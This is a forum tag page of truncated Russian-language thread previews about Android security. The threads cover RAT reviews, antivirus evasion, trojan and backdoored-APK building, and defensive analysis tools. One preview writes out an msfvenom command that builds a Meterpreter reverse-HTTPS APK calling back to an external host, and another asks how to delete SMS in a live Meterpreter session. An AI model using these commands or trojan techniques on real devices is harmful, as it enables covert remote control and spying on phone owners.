android

Всё по теме «android» на форуме Codeby.net. Обсуждений: 261. Разборы, инструменты и практика по информационной безопасности.
  1. Vander

    Статья Обзор инструмента AhMyth для Android: Функционал и возможности

    Приветствую! Сегодня мы рассмотрим очередной RAT для Android железяк – AnMyth. На мой взгляд, это довольно успешная реализация RAT, так как не требует от оператора каких либо специальных знаний. Он доступен для разных платформ с их списком, можно ознакомиться тут: >...
  2. Vander

    Glassdoor - Обеспечение безопасности Android приложений

    Привет! В этой статье рассмотрим приложение, целью создания которого является анализ и выявление вредоносного кода в приложениях для платформы Android. Glassdoor - это современная автономная система безопасности, предназначенная для Android APK, написанная на Scala. · Scala —...
  3. Vander

    Статья AVPass — инструмент для обхода антивируса на Android

    Приветствую, в этой статье я хочу показать инструмент, который позволит препятствовать обнаружению вредоносного ПО антивирусом на платформе Android. AVPass – в первую очередь, это инструмент для определения моделей систем обнаружения вредоносных программ Android (т. е. Антивирусного...
  4. K

    Meterpreter и Android.

    Господа, подскажите, каким образом можно организовать удаление смс в открытой сессии или отключение звука. Встроенных модулей вроде не нашел. Мне хотелось бы узнать проверенный метод.(Я понимаю про индивидуальность смартфонов) Но на крайний случай, подскажите в каком направлении двигаться. (В...
  5. Ondrik8

    превращаем Андрушу в машину для пентеста

    Всем привет! Поделюсь как превратить телефон/планшет на оси андройд в карманную машину для пентеста! 1) устанавливаем приложение TERMUX 2) apt update 3) apt install git 4) apt install nmap 5) apt install python2 6) git clone https://github.com/sqlmapproject/sqlmap.git дальше объяснять смысла...
  6. Dr.Lafa

    Статья Халатность разработчиков приложений для "мобильного заработка"

    *Здесь могло быть предупреждение о том, что не нужно пользоваться данным методом в целях совершения преступления, но вы же умные ребята, верно?* Don't try this at home, kids. Сегодня я хотел бы показать на примере, как халатно относятся разработчики приложений для "мобильного заработка"...
  7. O

    Статья Малварь + mp3/mp4 для android

    Всем привет! Совсем недавно, в соц сетях и мессенджерах пробежал слух, об страшном вирусе который заражает телефон,- через прослушивание аудио-сообщения в WhatsApp. Так же лично мне пришло предупреждение от сердобольных знакомых, об опасности прослушивания аудио-записи разговора Путина с...
  8. I

    Статья SSH Multi-Hop туннелирование на Android (без root)

    Доброго времени суток! Всем известно что для достижения анонимности используются Tor, I2P, цепочки Socks-proxy, всяческие VPN (OperaVPN hello) или их цепочки, в том числе собственные. И почти никто не использует SSH-транспорт для туннелирования дальше одного хоста. Информация по этому вопросу...
  9. C

    Решено Список команд для цели заарканенной через msf

    Доброго дня! Вот предположим я имею коннект через msf к устройству. Какие команды там есть для компов, и Android устройств?
  10. Vander

    Pentest with Android Smartphone

    Всем привет! В этой статье я хочу вас ознакомить с программой для Android смартфона, которая позволит выполнять аудит беспроводных сетей, напрямую со своего устройства. Программа называется – Hijacker. Hijacker – представляет собой графический пользовательский интерфейс, для аудита...
  11. Vander

    Статья Mara Framework. Reverse engineering APK

    Привет! В этой публикации я покажу фреймворк, который позволит проводить реверс-инжиниринг APK файлов. Называется он MARA Framework. Изменения в этой версии. Обновление происходит с помощью setup.sh. · Анализ домена · Сканирование Domain SLL с помощью pyssltest и testssl ·...
  12. Vander

    Статья Lobotomy - APK Reverse Ingineering Tool

    Приветствую всех! На днях мне попался еще один инструмент для проведения reverse-ingineering’a .apk файлов, и я хочу Вас с ним познакомить. Утилита носит название Lobotomy. Все, что о ней необходимо знать, можно поместить в короткий список, ниже: · Компоненты: Перечисление компонентов...
  13. L

    Проблема Как достать из apk файла secret key ?

    Добрый день, подскажите пожалуйста если вдруг кто знает, как достать из apk файла secret key для расшифровки базы данных? Ну и в целом мой таск такой, есть кусок базы зашифрованной, и есть апк которое в эту базу эти шифрованные данные записала. Необходимо определить метод шифрования и собственно...
  14. Vander

    Статья Взлом Android - устройства. (Backdoor-apk + HTA server)

    Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux. Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы...
  15. <~DarkNode~>

    Собираем скрытый троян на Andrroid(persistance) Часть II

    Сегодня продолжим собирать скрытый троян на Android. Прежде чем приступить к прочтению данной статьи настоятельно рекомендую прочитать подготовительную статью о настройках payload и как собирать подписанное апк приложения в android studio из исходников. Собираем скрытый троян на...
  16. <~DarkNode~>

    Статья Android WebView Exploit или взлом андроида по ссылке

    Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел) Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x) Если устройства с андроидом выше версии то смотрите эту статью...
  17. X

    Направьте что и где изучать ?

    Доброго времени суток. Начинаю разбираться в пентесте, начал с Wi-Fi, всё получается по гайдам, но не моё по гайдам ходить. Собственно сабж: Какие книги\статьи читать для развития в эту сторону ? Какие ресурсы посоветуете, кроме вашего) Желательно рус. Интересует: 1) Сеть, сайты. 2) Уязвимости в...
  18. <~DarkNode~>

    Статья Лучшие Android-инструменты для пентестинга и кибербезопасности 2025

    Доброго времени суток, друзья! Предлагаю создать здесь полезный и постоянно пополняемый список Android-утилит и приложений, которые мы, специалисты по кибербезопасности и энтузиасты, используем для тестирования на безопасность, анализа сетей и просто для повседневных задач. Для тех, кто...
  19. Vander

    Статья Взлом Android-устройства

    Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом. Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта www.apk4fun.com, попробуем, для начала, на ней...
  20. veterok

    Взлом android: msfvenom -p android/...

    Основу взял тут. Предварительно пробросил 443 порт на роутере. Создал АРК msfvenom -p android/meterpreter/reverse_https LHOST=****.hldns.ru LPORT=443 R > example.apk Затем создал подпись keytool -genkey -v -keystore release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity...